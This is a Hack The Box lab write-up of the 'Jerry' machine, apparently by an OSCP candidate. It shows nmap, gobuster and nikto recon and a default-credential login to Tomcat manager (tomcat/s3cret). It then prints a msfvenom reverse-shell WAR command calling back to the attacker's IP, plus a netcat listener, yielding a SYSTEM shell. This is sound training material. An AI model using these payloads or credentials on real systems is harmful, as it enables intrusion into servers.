Hack The Box: Jerry Write-up (#39)
7 min readNov 18, 2020
This is my 39th box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.
Reconnaissance
Run the nmapAutomator script to enumerate open ports and services running on those ports.
./nmapAutomater 10.10.10.95 All- All: Runs all the scans consecutively (~20–30 minutes)
We get the back the following result:
Running all scans on 10.10.10.95Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:12 +08
Nmap scan report for 10.10.10.95
Host is up (0.013s latency).
Not shown: 999 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 6.06 seconds---------------------Starting Nmap Basic Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:12 +08
Nmap scan report for 10.10.10.95
Host is up (0.015s latency).PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.49 seconds----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:12 +08
Nmap scan report for 10.10.10.95
Host is up.
All 1000 scanned ports on 10.10.10.95 are open|filteredNmap done: 1 IP address (1 host up) scanned in 201.50 seconds---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:16 +08
Initiating Parallel DNS resolution of 1 host. at 21:16
Completed Parallel DNS resolution of 1 host. at 21:16, 0.01s elapsed
Initiating SYN Stealth Scan at 21:16
Scanning 10.10.10.95 [65535 ports]
Discovered open port 8080/tcp on 10.10.10.95
Warning: 10.10.10.95 giving up on port because retransmission cap hit (1).
SYN Stealth Scan Timing: About 11.78% done; ETC: 21:20 (0:03:52 remaining)
SYN Stealth Scan Timing: About 23.20% done; ETC: 21:20 (0:03:22 remaining)
SYN Stealth Scan Timing: About 34.63% done; ETC: 21:20 (0:02:52 remaining)
SYN Stealth Scan Timing: About 46.06% done; ETC: 21:20 (0:02:22 remaining)
SYN Stealth Scan Timing: About 57.48% done; ETC: 21:20 (0:01:52 remaining)
SYN Stealth Scan Timing: About 67.89% done; ETC: 21:20 (0:01:26 remaining)
SYN Stealth Scan Timing: About 80.34% done; ETC: 21:20 (0:00:52 remaining)
Completed SYN Stealth Scan at 21:20, 262.71s elapsed (65535 total ports)
Nmap scan report for 10.10.10.95
Host is up (0.0093s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
8080/tcp open http-proxyRead data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.80 seconds
Raw packets sent: 131275 (5.776MB) | Rcvd: 206 (9.064KB)No new ports---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:20 +08
Nmap scan report for 10.10.10.95
Host is up (0.0086s latency).PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.29 secondsRunning Vuln scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:20 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.95
Host is up (0.063s latency).PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
|_ /docs/: Potentially interesting folder
|_http-server-header: Apache-Coyote/1.1
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.92 seconds---------------------Recon Recommendations----------------------Web Servers Recon:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.95:8080 -o recon/gobuster_10.10.10.95_8080.txt
nikto -host 10.10.10.95:8080 | tee recon/nikto_10.10.10.95_8080.txtWhich commands would you like to run?
All (Default), gobuster, nikto, Skip <!>Running Default in (1) s:---------------------Running Recon Commands----------------------Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.95:8080
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/12 21:22:50 Starting gobuster
===============================================================
http://10.10.10.95:8080/aux (Status: 200) [Size: 0]
http://10.10.10.95:8080/com3 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com1 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com2 (Status: 200) [Size: 0]
http://10.10.10.95:8080/con (Status: 200) [Size: 0]
http://10.10.10.95:8080/docs (Status: 302) [Size: 0]
http://10.10.10.95:8080/examples (Status: 302) [Size: 0]
http://10.10.10.95:8080/favicon.ico (Status: 200) [Size: 21630]
http://10.10.10.95:8080/host-manager (Status: 302) [Size: 0]
http://10.10.10.95:8080/lpt1 (Status: 200) [Size: 0]
http://10.10.10.95:8080/lpt2 (Status: 200) [Size: 0]
http://10.10.10.95:8080/manager (Status: 302) [Size: 0]
http://10.10.10.95:8080/nul (Status: 200) [Size: 0]
http://10.10.10.95:8080/prn (Status: 200) [Size: 0]
===============================================================
2020/09/12 21:23:10 Finished
===============================================================Finished gobuster scan
=========================
Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.95
+ Target Hostname: 10.10.10.95
+ Target Port: 8080
+ Start Time: 2020-09-12 21:23:10 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ 7970 requests: 3 error(s) and 14 item(s) reported on remote host
+ End Time: 2020-09-12 21:42:40 (GMT8) (1170 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testedFinished nikto scan
=========================
---------------------Finished all Nmap scans---------------------
Only port 8080 is open.
- Port 8080: — Running HTTP service, Apache-Coyote/1.1
Before we begin, let’s make mental notes based on the scan results.
- The only open port is port 80. Surely this will be our entry point to the target. A quick Google search for “Apache Coyote” reveals that is a Connector component for Tomcat that supports the HTTP 1.1 protocol as a web server. Nikto scan results discovered that tomcat manager using the default credentials tomcat/s3cret. The path to the tomcat manager we can get it from the Gobuster scan results which is /manager. For your information, this is default tomcat manager path. Apache Tomcat by design allows you to run code, so we can simply deploy a war file that sends a reverse shell back to our attack machine. Since we have enough information we can directly jump into the exploitation phase.
Exploitation
Visit the /manager.
Key in the discovered default credentials tomcat/s3cret.
We are authenticated.
Next, generate MSFvenom payload.
msfvenom -p java/jsp_shell_reverse_tcp -f war lhost=10.10.14.31 lport=53 -o shell.warUpload the shell.war payload.
Set up a Netcat listener on your Kali Linux.
nc -nlvp 53Visit the shell payload from browser
http://10.10.10.95:8080/shell/or click the shell folder in the manager.
Then go back the listener to see if get a shell.
We are SYSTEM! We don’t even require to escalate privilege. Seems like apache tomcat service have been running with SYSTEM privilege. Grab the user and root flag.
Attack Strategy Map
I have summarized the entire attack strategy on this map.
Thank you for reading :-) Next box is Conceal.
